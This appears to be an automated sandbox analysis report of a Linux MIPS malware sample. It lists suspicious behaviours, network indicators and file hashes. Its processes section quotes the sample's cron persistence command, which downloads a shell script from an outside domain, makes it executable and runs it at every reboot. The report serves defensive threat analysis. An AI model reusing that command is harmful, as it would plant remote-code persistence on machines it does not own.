Analysis Overview
SHA256
cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3
Threat Level: Shows suspicious behavior
The file cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:54
Reported
2024-10-27 02:57
Platform
debian12-mipsel-20240221-en
Max time kernel
151s
Max time network
142s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 152.53.15.127 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.wB9D8g | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | [watchdog/0] | /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf | N/A |
Reads runtime system information
Processes
/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
[/tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp |
| UA | 88.151.195.22:5297 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.wB9D8g
| MD5 | bfd2089040b748f688b70470021d4d43 |
| SHA1 | c2a6fac8ce436a014bb4149d14d7853259b9323c |
| SHA256 | cfb81f43363ede429f69a6c15d63fbfdb87246bd92fc6a55a189c1001bfb4b3b |
| SHA512 | 4aee0c647992fff8bc38624556617e8b78523f37f9169ecc32dbc303821881cf90f1fdccc9add3cfc06b6089a8f8e17878173f132a16db77cb152869c2ea487e |